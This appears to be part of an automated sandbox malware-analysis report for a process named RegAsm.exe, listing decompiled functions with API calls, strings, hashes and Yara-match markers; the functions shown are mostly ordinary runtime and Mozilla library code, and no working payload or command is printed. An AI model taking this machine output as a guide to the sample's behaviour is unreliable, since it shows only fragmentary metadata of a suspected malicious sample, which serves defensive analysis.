Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$?ensure?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CapacityCaptureChunkedOptions@2@@ProfileProfilingSlow@StackStack@baseprofiler@mozilla@@free
String ID: baseprofiler::profiler_capture_backtrace
API String ID: 3592261714-147032715
Opcode ID: 1f9d6d9f03d5b4279c07a862719cd6d08499d2b9d50c685d9a4563218a0aa549
Instruction ID: 6022f9ad46874abf8faff604281e72c43e91410a7540bc28865154f60aaa8029
Opcode Fuzzy Hash: 1f9d6d9f03d5b4279c07a862719cd6d08499d2b9d50c685d9a4563218a0aa549
Instruction Fuzzy Hash: 1421AD74B00285DBDB04DF6ACC50ABE73B9AFC5308F15446ED8059BBA1DB70AD05CBA5

Function 6C51F180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(?,?), ref: 6C51F19B

Part of subcall function 6C53D850: EnterCriticalSection.KERNEL32(?), ref: 6C53D904
Part of subcall function 6C53D850: LeaveCriticalSection.KERNEL32(?), ref: 6C53D971
Part of subcall function 6C53D850: memset.VCRUNTIME140(?,00000000,?), ref: 6C53D97B

mozalloc_abort.MOZGLUE(?), ref: 6C51F209

Strings

d, xrefs: 6C51F1F5

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
String ID: d
API String ID: 3775194440-2564639436
Opcode ID: 1fae0373f2013a2eb2601624fca016c670ff9a6dfaf24f679f33c2b2c7adc17a
Instruction ID: b5bd0cb3ca9b3b93b5a48411189a9848813bbd5c181b7b0783500c09cae29418
Opcode Fuzzy Hash: 1fae0373f2013a2eb2601624fca016c670ff9a6dfaf24f679f33c2b2c7adc17a
Instruction Fuzzy Hash: B1115C32E0964A87EB04CF58CD651FEB379EFC6218B12521DDC05ABB11EB30A984C380

Function 0040F093 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F0D6
_memmove.LIBCMT ref: 0040F104

Strings

string too long, xrefs: 0040F0D1

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: 8a227626b72f4056b64c0a26e4177402fb02d15917d8bca6e61607cae78b5d0a
Instruction ID: 7a0806fae085cf6787416122fb97cfb1012f07200118ac727d966ddb9d8bf46f
Opcode Fuzzy Hash: 8a227626b72f4056b64c0a26e4177402fb02d15917d8bca6e61607cae78b5d0a
Instruction Fuzzy Hash: D211E371300201AFDB24DE2DD840929B369FF85354714013FF801ABBC2C779EC59C2AA

Function 00411ECF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00411EF9

Strings

image/jpeg, xrefs: 00411F21

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc
String ID: image/jpeg
API String ID: 2803490479-3785015651
Opcode ID: 6b72b0d373d1163626baf5e7838df7277c332a4d567d67e2b356543416a513d9
Instruction ID: 1c9963d8e1bd3712552ddde0994ffc3eb950a7432bc1cc1e62e4a2615aecff81
Opcode Fuzzy Hash: 6b72b0d373d1163626baf5e7838df7277c332a4d567d67e2b356543416a513d9
Instruction Fuzzy Hash: 5A11A572910108FFCB10CFA5CD848DEBB7AFE05361B21026BEA11A21A0D7769E81DA54

Function 6C52CA10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?), ref: 6C52CA26

Part of subcall function 6C52CAB0: EnterCriticalSection.KERNEL32(?), ref: 6C52CB49
Part of subcall function 6C52CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C52CBB6

mozalloc_abort.MOZGLUE(?), ref: 6C52CAA2

Strings

d, xrefs: 6C52CA6C

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavemallocmozalloc_abort
String ID: d
API String ID: 3517139297-2564639436
Opcode ID: d206b3a1608d885ace74e9c83c793e16f06a79e03e3be29a2f3c955641d0f126
Instruction ID: 465f6eb73bb27a0e9f2d403a6f220fa9cdc8bbb63ae4e992f889c2c8fd513263
Opcode Fuzzy Hash: d206b3a1608d885ace74e9c83c793e16f06a79e03e3be29a2f3c955641d0f126
Instruction Fuzzy Hash: C811E531E00699D7EB01DB68CC500FDB3B5EF96214B469259DC4597653FB34E5C8C380

Function 0040F128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F13E

Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80

Part of subcall function 0040F238: std::_Xinvalid_argument.LIBCPMT ref: 0040F242

_memmove.LIBCMT ref: 0040F190

Strings

invalid string position, xrefs: 0040F139

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position
API String ID: 3404309857-1799206989
Opcode ID: 91242230ce68a24c4f38e49356161a9258fe8054196df98927784ca714c59dc8
Instruction ID: e23b5eb9a1e42f9e221b8677ce3c7703de2c6ddbdd5f367577b3bfe0c378d6ff
Opcode Fuzzy Hash: 91242230ce68a24c4f38e49356161a9258fe8054196df98927784ca714c59dc8
Instruction Fuzzy Hash: 0111E131304210DBDB24DE6DD88095973A6AF55324754063BF815EFAC2C33CED49879A

Function 6C553CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C553D19
mozalloc_abort.MOZGLUE(?), ref: 6C553D6C

Strings

d, xrefs: 6C553D58

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 4c0ba7a4f0a67496a9b9b5bf48d141da5cfb2e6878e71ad5e326afcdd0616f58
Instruction ID: 6e4eac1213c7e7b99f57ee7cad1c475fa08cb34760ce996f7a7361216ef76aca
Opcode Fuzzy Hash: 4c0ba7a4f0a67496a9b9b5bf48d141da5cfb2e6878e71ad5e326afcdd0616f58
Instruction Fuzzy Hash: 80112731E04689D7DF01DF69CC144EDB775EF86358B86925AEC499B602FB30A994C390

Function 6C531A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

realloc.MOZGLUE(?,?), ref: 6C531A6B

Part of subcall function 6C531AF0: EnterCriticalSection.KERNEL32(?), ref: 6C531C36

mozalloc_abort.MOZGLUE(?), ref: 6C531AE7

Strings

d, xrefs: 6C531AB1

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalEnterSectionmozalloc_abortrealloc
String ID: d
API String ID: 2670432147-2564639436
Opcode ID: 85fb6bc21d28f5923ef16f29cc47921430cfd30ceef2b137050a21fe9ced6c45
Instruction ID: 99bced1e04eab6e657d0d0935dd41aad7421da01b5bf21474fa61c5c05deacb3
Opcode Fuzzy Hash: 85fb6bc21d28f5923ef16f29cc47921430cfd30ceef2b137050a21fe9ced6c45
Instruction Fuzzy Hash: 20110632E006ACD7DB048BA8CC144FEB7B5EF86214F46A619DD4A9B612FB70E5C4C390

Function 6C524730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C5244B2,6C59E21C,6C59F7F8), ref: 6C52473E
GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C52474A

Strings

GetNtLoaderAPI, xrefs: 6C524744

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetNtLoaderAPI
API String ID: 1646373207-1628273567
Opcode ID: 862c392d868dcf85f07066352f6afa7a7a221ebf4a0a68bf022179547e9a3ecd
Instruction ID: a0b8aca1dc62802dd26019d4a33e99ec21f9d0e205f493d1740218978c777565
Opcode Fuzzy Hash: 862c392d868dcf85f07066352f6afa7a7a221ebf4a0a68bf022179547e9a3ecd
Instruction Fuzzy Hash: 2B0152757012949FDF00AFA6DC8861E7BF9FB8B711B0A44AAE906C7740DB74D8028F95

Function 0040F34D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F35C

Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80

memmove.MSVCRT(0040EEBE,0040EEBE,C6C68B00,0040EEBE,0040EEBE,0040F15F,?,?,?,0040F1DF,?,?,?,76230440,?,-00000001), ref: 0040F392

Strings

invalid string position, xrefs: 0040F357

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
String ID: invalid string position
API String ID: 1659287814-1799206989
Opcode ID: 348d0c2b69c2b191df159d42681712194dc71b74dbe289b0b6df523c31963809
Instruction ID: a91313bf5449129972d3e0b6c61bf396901b99abf7d864de5386db584678c47f
Opcode Fuzzy Hash: 348d0c2b69c2b191df159d42681712194dc71b74dbe289b0b6df523c31963809
Instruction Fuzzy Hash: 6F01AD713007018BD7348E7989C491FB2E2EB85B21734493ED882D7B85DB7CE84E8398

Function 004281CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

strcpy_s.MSVCRT ref: 004281DE
__invoke_watson.LIBCMT ref: 00428232

Part of subcall function 0042806D: _strcat_s.LIBCMT ref: 0042808C

Strings

,NC, xrefs: 0042821D

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __invoke_watson_strcat_sstrcpy_s
String ID: ,NC
API String ID: 1132195725-1329140791
Opcode ID: 731b6ac6b642e3e8e5147aea8b100b6241764734f43c48f2503a638a59afb5d8
Instruction ID: 7263c20261f1d33d4cce58c4812a6ccf3018c0f2168d81fa3d23ea862a0e3966
Opcode Fuzzy Hash: 731b6ac6b642e3e8e5147aea8b100b6241764734f43c48f2503a638a59afb5d8
Instruction Fuzzy Hash: A0F0C872641228BFDB116A91EC02EDB3F59EF04350F854066F91955111DA36AD54C764

Function 6C576DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C576E22
__Init_thread_footer.LIBCMT ref: 6C576E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C576E1D

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 3c3587b39cf4dc9910c966cdaf7b66259f10eb007de7463856fdca737e6fa682
Instruction ID: cd5c14303ba28b5d2f0099c4d0c83aaa53d621d4121bd879248b4d8eb80ebe5c
Opcode Fuzzy Hash: 3c3587b39cf4dc9910c966cdaf7b66259f10eb007de7463856fdca737e6fa682
Instruction Fuzzy Hash: 10F024326043C0CBDE108F68CC50A923771D343318F2602E5EC0146B91CB60B946CAB7

Function 6C529E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C529EEF

Strings

NaN, xrefs: 6C529EC1
Infinity, xrefs: 6C529EB7

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
API String ID: 1385522511-4285296124
Opcode ID: 5c7bfdcdb5e872ecd8c3c810d5928855d2942bf75091c135f31c17efab47e169
Instruction ID: d2aa60e66829de3a402ea20933784b590f052c7dc1debbdd194229efdaea273d
Opcode Fuzzy Hash: 5c7bfdcdb5e872ecd8c3c810d5928855d2942bf75091c135f31c17efab47e169
Instruction Fuzzy Hash: 4DF03C717013C1CAEF008F18DD8579133B1E74731DF234B99E5040ABA0D7B565568A8A

Function 0041F3BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 0041F3F0
DName::DName.LIBCMT ref: 0041F3FC

Strings

{flat}, xrefs: 0041F3EB

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: c0aecf38d8767bf2edb4203e1a237864f4bfc1262168b0dc7fac00c370597be1
Instruction ID: da75913b68d6d07b0bcc9ceeb751d75e82138ebb165cf24839429cfec7228cb0
Opcode Fuzzy Hash: c0aecf38d8767bf2edb4203e1a237864f4bfc1262168b0dc7fac00c370597be1
Instruction Fuzzy Hash: 75F08535244208AFCB11EF59D445AE43BA0AF8575AF08808AF9484F293C774E882CB99

Function 6C526C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0KUl,?,6C554B30,80000000,?,6C554AB7,?,6C5143CF,?,6C5142D2), ref: 6C526C42

Part of subcall function 6C52CA10: malloc.MOZGLUE(?), ref: 6C52CA26

moz_xmalloc.MOZGLUE(0KUl,?,6C554B30,80000000,?,6C554AB7,?,6C5143CF,?,6C5142D2), ref: 6C526C58

Strings

0KUl, xrefs: 6C526C33, 6C526C41, 6C526C57

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$malloc
String ID: 0KUl
API String ID: 1967447596-778617342
Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction ID: ef5adf9186000a688f74ee3bad7ae9d6788135e26380c60eb15c59e5a4412a32
Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction Fuzzy Hash: 09E086F1A107054AEB08E9799C0A56B71C8CB742A87044A35E822E6BC9FF5CE9508191

Function 6C575900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6C5951C8), ref: 6C57591A
CloseHandle.KERNEL32(FFFFFFFF), ref: 6C57592B

Strings

MOZ_SKELETON_UI_RESTARTING, xrefs: 6C575915

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CloseEnvironmentHandleVariable
String ID: MOZ_SKELETON_UI_RESTARTING
API String ID: 297244470-335682676
Opcode ID: 6235a5855f04f70e09ac973eed36803a3b1b125c4df286ab46948087db797db9
Instruction ID: 65bcd761d0b06d55609941c98f4c81c08cbe5f112bd1f74de3da3e465a7bd180
Opcode Fuzzy Hash: 6235a5855f04f70e09ac973eed36803a3b1b125c4df286ab46948087db797db9
Instruction Fuzzy Hash: A3E0D8302042C0F7DB115F68CD087457FF89B1372AF564688F5A983AC1C3B15880C3A1

Function 0040141E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401436
GlobalMemoryStatusEx.KERNEL32(?), ref: 00401449

Strings

@, xrefs: 00401442

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

